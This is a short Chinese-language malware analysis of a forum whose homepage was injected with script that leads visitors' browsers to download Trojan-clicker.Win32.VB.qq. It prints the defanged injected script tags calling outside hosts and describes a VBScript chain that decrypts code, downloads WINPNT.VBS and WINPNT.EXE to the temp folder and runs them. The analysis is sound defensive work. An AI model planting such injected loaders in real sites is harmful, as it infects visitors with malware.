某论坛被加入下载Trojan-clicker.Win32.VB.qq的代码

论坛首页被加入代码:

/------
＜script language="javascript" src="hxxp://*61.146.118.1*1/news***/include*/m***d5.asp?ad*=1****"＞＜/script＞
------/

m***d5.asp?ad*=1**** 中发现代码：

/------
document.write("＜script language=/"javascript/" src=/"hxxp://www.cnfish.com/editor/htmleditor/images/WINPNT.JS/"＞＜/script＞");
------/

WINPNT.JS 中发现JavaScript脚本程序，功能是输出一段VBScript脚本程序。

该VBScript脚本程序的功能是调用自定义函数r(k)来解密用~分隔的数字字符串并执行，利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 从另一网站hxxp://www.c***nfi**sh**.com.**/下载文件WINPNT.VBS，保存为%temp%/WINPNT.VBS，利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。

WINPNT.VBS 包含VBScript脚本程序，下载文件WINPNT.EXE，保存为%temp%/WINPNT.EXE，使用 Wscript.Sleep 让脚本暂停5 秒(5000 毫秒)，再利用Wscript.Shell 对象Shell 的 run 方法 来运行。

WINPNT.EXE 采用 VB 编写，ASPack 2.12 -＞ Alexey Solodovnikov 加壳。